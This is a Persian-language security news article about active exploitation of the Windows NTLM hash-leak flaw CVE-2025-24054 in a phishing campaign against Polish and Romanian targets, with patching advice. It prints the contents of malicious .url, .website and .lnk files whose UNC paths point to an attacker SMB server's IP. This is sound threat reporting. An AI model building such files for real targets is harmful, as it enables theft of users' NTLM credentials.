خانه » حملات فعال به CVE-2025-24054: سرقت هش‌های NTLM هنگام دانلود فایل

حملات فعال به CVE-2025-24054: سرقت هش‌های NTLM هنگام دانلود فایل

توسط Vulnerbyt_News
cve-2025-24054-ntlm-exploit-in-the-wild گروه والنربایت vulnerbyte

آژانس امنیت سایبری و امنیت زیرساخت ایالات متحده (CISA) روز 17 آوریل یک آسیب‌پذیری امنیتی با شدت متوسط در ویندوز را به فهرست آسیب‌پذیری‌های شناخته‌شده مورد سوءاستفاده (KEV) اضافه کرد؛ این اقدام در پی گزارش‌هایی مبنی بر سوءاستفاده فعال از این آسیب‌پذیری انجام شده است.

جزئیات آسیب پذیری CVE-2025-24054

این آسیب‌پذیری که با شناسه CVE-2025-24054 (با امتیاز CVSS معادل ۶.۵) ردیابی می‌شود، یک باگ افشای هش NTLM از طریق حملات جعل (Spoofing) در ویندوز است که ماه مارس توسط مایکروسافت و به‌عنوان بخشی از به‌روزرسانی‌های Patch Tuesday پچ شده است.
NTLM یک پروتکل احراز هویت قدیمی است که مایکروسافت سال گذشته آن را در مقابل Kerberos منسوخ اعلام کرد. در سال‌های اخیر، مهاجمان روش‌های مختلفی را برای سوءاستفاده از این فناوری، مانند pass-the-hash و حملاتrelay  به‌منظور استخراج هش‌های NTLM برای انجام حملات بعدی یافته‌اند.

مایکروسافت از Rintaro Koike از شرکت NTT Security Holdings، 0x6rss و j00sean بابت کشف و گزارش این نقص تشکر کرده است. مایکروسافت احتمال سوءاستفاده از آسیب‌پذیری CVE-2025-24054 را کم ارزیابی کرده بود؛ اما این آسیب‌پذیری طبق گزارش Check Point از ۱۹ مارس تحت سوءاستفاده فعال قرار گرفته است و به مهاجمان اجازه داده تا هش‌های NTLM یا رمزهای عبور کاربران را فاش کرده و به سیستم‌ها نفوذ کنند.

طبق گزارش Check Point، این آسیب‌پذیری زمانی فعال می‌شود که کاربر یک آرشیو ZIP حاوی فایل مخرب library-ms را استخراج کند. این رویداد باعث می‌شود Windows Explorer یک درخواست احراز هویت SMB به سرور راه دور آغاز کند و در نتیجه، بدون هیچ تعاملی از سوی کاربر، هش NTLM کاربر افشا شود.

کمپین NTLM Exploits Bomb

این کمپین در حدود ۲۰ تا ۲۱ مارس ۲۰۲۵ رخ داده و اهداف اصلی آن به نظر می‌رسد دولت‌ها و مؤسسات خصوصی در کشورهای لهستان و رومانی بوده‌اند. مهاجمان در این حمله از ایمیل‌های فیشینگ استفاده کردند که حاوی لینک‌هایی به Dropbox بودند. این لینک‌ها یک فایل آرشیو (xd.zip) را در اختیار قربانیان قرار می‌داد.

cve-2025-24054-ntlm-exploit-in-the-wild گروه والنربایت vulnerbyte
ایمیل فیشین

هنگامی که کاربر، این آرشیو را دانلود و محتویات آن را از حالت فشرده خارج کند، اکسپلویت به‌طور خودکار فعال شده و هش NTLMv2-SSP کاربر را افشا می‌کند.

آرشیو xd.zip حاوی چهار فایل جاسازی‌شده است که همگی تنها با هدف افشای هش NTLMv2-SSP طراحی شده‌اند. این فایل‌ها پس از اجرا (یا حتی فقط از حالت فشرده خارج شدن) با یک سرور SMB مخرب با آدرس IP، 159.196.128[.]120 ارتباط برقرار کرده و هش‌ها را ارسال می‌کنند. جزئیات فایل‌های مخرب در آرشیو:

  1. xd.library-ms:
    این فایل مسئول فعال‌سازی آسیب‌پذیری CVE-2025-24054 است.
  2. xd.url:
    فایل با پسوند .url برای ایجاد میانبر اینترنتی به یک آدرس (URL) استفاده می‌شود. این نوع فایل می‌تواند علاوه‌بر آدرس‌های وب، به منابع موجود در شبکه از طریق مسیرهای UNC نیز اشاره کند. این مسیرها معمولا به‌شکل

\\ServerName\SharedFolder\Resource نوشته می‌شوند.
ارتباطات برقرارشده از این طریق، معمولا مبتنی بر پروتکل SMB بوده و در اینجا، با استفاده از آسیب‌پذیری CVE-2024-43451، می‌تواند اطلاعات حساسی مانند هش‌های NTLMv2 را افشا کند. بررسی‌ها نشان می‌دهد که این آسیب‌پذیری (با امتیاز CVSS برابر ۶.۵) توسط مایکروسافت در نوامبر ۲۰۲۴ پچ شده بود و پیش از این نیز در حملات علیه اوکراین و کلمبیا توسط گروه‌هایی نظیر UAC-0194 و Blind Eagle مورد اکسپلویت قرار گرفته بود.
این آسیب‌پذیری زمانی فعال می‌شود که کاربر کارهایی مانند راست‌کلیک کردن، حذف کردن یا درَگ‌ اند دراپ(drag-and-drop) کردن فایل را انجام دهد. متادیتاهای مرتبط با این فایل به شرح زیر است:

				
					[InternetShortcut]
URL=file://159.196.128[.]120/
IconIndex=4
HotKey=0
IDList=
IconFile=\\\\159.196.128[.]120\\share\\pentestlab.ico
				
			
  • xd.website:
    این فایل کارکردی مشابه فایل‌های .url دارد؛ اما شامل متادیتا‌های اضافی برای برنامه‌های وب مدرن است. این فایل هم می‌تواند به منابع محلی یا شبکه‌ای از طریق مسیرهای UNC متصل شود و در صورت تعامل کاربر، یک ارتباط SMB ایجاد کرده و اطلاعات را افشا کند. متادیتاهای مربوط به این فایل در قسمت زیر آمده است:
				
					[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
Prop4=31,go.microsoft.com
[InternetShortcut]
URL=file://159.196.128[.]120/
[{A7AF692E-098D-4C08-A225-D433CA835ED0}]
Prop5=3,0
Prop9=19,0
Prop2=65,2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF310000002B000000710600006204000056
Prop6=3,1
[{9F4C2855-9F79-4B39-A8D0-E1D42DE1D5F3}]
Prop5=8,Microsoft.Website.B4BD2547.99055A5E
				
			
  • xd.lnk:

فایل با پسوند lnk در ویندوز برای میانبر استفاده می‌شود. میانبر یا Shortcut درواقع یک اشاره‌گر به یک فایل، پوشه یا برنامه دیگر است. وقتی کاربر روی یک فایل lnk دوبار کلیک می‌کند، ویندوز به‌طور خودکار هدف تعریف‌شده در میانبر را باز می‌کند. این هدف می‌تواند یک برنامه، سند یا حتی یک منبع شبکه‌ای از طریق مسیر UNC باشد. زمانی که آدرس هدف یک فایل lnk به یک سرور ریموت اشاره کند، یک اتصال SMB برقرار می‌شود و به واسطه پیام NTLMSSP_AUTH، کلاینت به‌شکل ناخواسته هش NTLMv2-SSP کاربر را افشا می‌کند. در ادامه،متادیتاهای این فایل آورده شده است:

				
					Target Path      : \\\\159.196.128.120
Working Directory: None
Arguments        : None
Description      : None
Icon Location    : None
Relative Path    : ..\\..\\..\\..\\Windows
Show Command     : Normal
				
			

تمام فایل‌های ذکرشده در این آرشیو، درصورتی‌که کاربر به‌شکل دستی روی آن‌ها کلیک کند، تلاش می‌کنند به منابع اشتراکی شبکه (Network Share) متصل شوند و در نتیجه یک اتصال SMB برقرار می‌شود که می‌تواند هش‌های NTLMv2-SSP را به سمت مهاجم ارسال کند.

با این‌حال، دو مورد از این فایل‌ها که از اکسپلویت‌ها استفاده می‌کردند (مانند .library-ms) حتی نیازی به کلیک کاربر هم ندارند و تنها با خارج شدن از حالت فشرده یا تعامل خیلی محدود، فرآیند افشای هش را انجام می‌دهند.

نکته جالب اینکه در ژانویه ۲۰۲۴، شرکت امنیتی HarfangLab گزارش داده بود که آدرس IP مربوط به سرور مهاجم با APT28 (معروف به Fancy Bear یا Forest Blizzard) که یکی از گروه‌های تهدید تحت حمایت دولت روسیه است، در ارتباط بوده است. با این حال، در حال حاضر اطلاعات مستقیمی مبنی بر ارتباط این IP با این گروه APT در این حمله در دسترس نیست.

حملات دیگر

در ۲۵ مارس ۲۰۲۵، کمپین دیگری کشف شد که برخلاف موارد قبلی، فایل‌های library-ms را بدون فشرده‌سازی و مستقیم توزیع می‌کرد. به گفته مایکروسافت، این سوءاستفاده با تعامل حداقلی کاربر با فایل مخرب، مانند انتخاب فایل (تک کلیک)، Inspect (راست‌کلیک) یا انجام هر اقدامی به جز باز کردن یا اجرای فایل، فعال می‌شود.

cve-2025-24054-ntlm-exploit-in-the-wild گروه والنربایت vulnerbyte
Unzipped Exploit file

توصیه امنیتی

اکسپلویت های ذکر شده، نیاز حیاتی سازمان‌ها به نصب فوری پچ‌ها و اطمینان از بررسی کامل آسیب‌پذیری‌های NTLM در محیطشان را نشان می‌دهد. حداقل تعامل لازم برای فعال شدن این اکسپلویت ها و سهولت مهاجمان در به‌دست‌آوردن هش‌های NTLM، این آسیب‌پذیری را به تهدیدی جدی تبدیل می‌کند، به‌ویژه که این هش‌ها می‌توانند در حملات pass-the-hash مورد استفاده قرار گیرند.

سازمان‌های غیرنظامی فدرال(FCEB)  موظف شده‌اند تا ۸ می ۲۰۲۵، پچ‌های لازم برای این آسیب‌پذیری را اعمال کرده و شبکه‌های خود را در برابر اکسپلویت‌های فعال ایمن‌سازی کنند.

شاخص های نفوذ را می‎توانید از طریق این لینک مشاهده کنید.

منابع:

همچنین ممکن است دوست داشته باشید

پیام بگذارید